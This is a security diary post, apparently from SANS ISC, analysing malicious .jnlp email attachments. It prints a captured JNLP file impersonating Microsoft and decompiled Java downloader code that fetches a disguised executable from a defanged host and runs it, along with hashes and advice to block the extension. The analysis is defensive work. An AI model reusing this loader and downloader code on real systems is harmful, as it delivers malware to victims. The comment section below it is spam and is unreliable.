Another File Extension to Block in your MTA: .jnlp

Published: 2021-01-22
Last Updated: 2021-01-22 08:59:37 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

When hunting, one thing that I like to learn is how attackers can be imaginative at deploying new techniques. I spotted some emails that had suspicious attachments based on the ‘.jnlp’ extension. I’m pretty sure that many people don’t know what’s their purpose and, if you don’t know them, you don’t have a look at them on your logs, SIEM, ... That makes them a good candidate to deliver malicious code!

Basically, a JNLP file[1] is... an XML file! It is created in the “Java Network Launching Protocol”. It contains all the required information to execute a Java program. Usually, it contains the address where to download the malicious applet and the initial class to run.

I did a quick analysis of one of the captured JNLP files:

<?xml version="1.0" encoding="utf-8"?> 
  <jnlp spec="1.0+" codebase="hxxp://secured-doc-read[.]net" href="delivery.jnlp">
  <information> 
    <title>Secure Document Reader</title> 
    <vendor>Microsoft</vendor> 
    <homepage href="wwww.microsoft.com"/> 
    <description>Microsoft Secure Document Reader v.4.016</description> 
  </information> 
  <security>
    <all-permissions/>
  </security>
  <resources> 
    <j2se version="1.6+" /> 
    <jar href="delivery.jar" />
  </resources> 
  <application-desc main-class="Secure_Document_Reader"> 
  </application-desc>
  wghjs100570 
</jnlp>

The syntax is easy to understand. The payload will be called ‘delivery.jar’ (line 14) and downloaded from secured-doc-read[.].net (line 2). The main class is "Secure_Document_Reader" (line 16).

I decompiled the Jar file (SHA256:a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd)[2] and was surprised to find a very simple code. Often malicious Java applets implement a RAT but here we faced the simple code of a downloader:

public class Secure_Document_Reader
{
  static BufferedInputStream frisco415;
  static FileOutputStream friekiegee;
  static String linkage9;

  public static void main(final String[] array) {
    frisco415("hxxp://sec-doc-v[.]com/images/dsc0386234.jpg");
  }

  public static void frisco415(final String spec) {
    final File file = new File(Secure_Document_Reader.linkage9);
    try {
      Secure_Document_Reader.frisco415 = new BufferedInputStream(new URL(spec).openStream());
      Secure_Document_Reader.friekiegee = new FileOutputStream(Secure_Document_Reader.linkage9);
      final byte[] array = new byte[1024];
      int read;
      while ((read = Secure_Document_Reader.frisco415.read(array, 0, 1024)) != -1) {
        Secure_Document_Reader.friekiegee.write(array, 0, read);
      }
      Secure_Document_Reader.frisco415.close();
      Secure_Document_Reader.friekiegee.close();
    }
    catch (Exception ex) {}
    try {
      Desktop.getDesktop().open(file);
    }
    catch (Exception ex2) {}
  }

  static {
    Secure_Document_Reader.frisco415 = null;
    Secure_Document_Reader.friekiegee = null;
    Secure_Document_Reader.linkage9 = "C:\\ProgramData\\videodrv.exe";
  }
}

The next stage is download from hxxp://sec-doc-v[.]com/images/dsc0386234.jpg and dropped on disk as 'videodrx.exe". The PE file (SHA256:ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89) has a VT score of 14/59[3].

The usage of .jnlp files is a great way to bypass the first line of defenses (mail filters) because .jnlp files are text files and do not contain any executable code. Note that Java must be installed on the victim's computer to handle .jnlp files.

[1] https://fileinfo.com/extension/jnlp
[2] https://www.virustotal.com/gui/file/a4d95b7d196a4aca87cec384c5d21a756ab75cfaee7f4a20163d02109956a6dd/detection
[3] https://www.virustotal.com/gui/file/ceaf771da5e2678ed0d5844282bf0d464207c23842a8e36be3e7ab1df022ef89/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Keywords: Extension Java JNLP Malware
2 comment(s)
ISC Stormcast For Friday, January 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7340

Comments

cwqwqwq

www

Nov 17th 2022
6 months ago

eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>

EEW

Nov 17th 2022
6 months ago

WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]

qwq

Nov 17th 2022
6 months ago

dwqqqwqwq mashood

mashood

Nov 17th 2022
6 months ago

[https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)

isc.sans.edu

Nov 23rd 2022
6 months ago

[https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]

isc.sans.edu

Nov 23rd 2022
6 months ago

What's this all about ..?

isc.sans.edu

Dec 3rd 2022
5 months ago

password reveal .

isc.sans.edu

Dec 3rd 2022
5 months ago

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission

isc.sans.edu

Dec 26th 2022
5 months ago

https://thehomestore.com.pk/

isc.sans.edu

Dec 26th 2022
5 months ago

Login here to join the discussion.


Diary Archives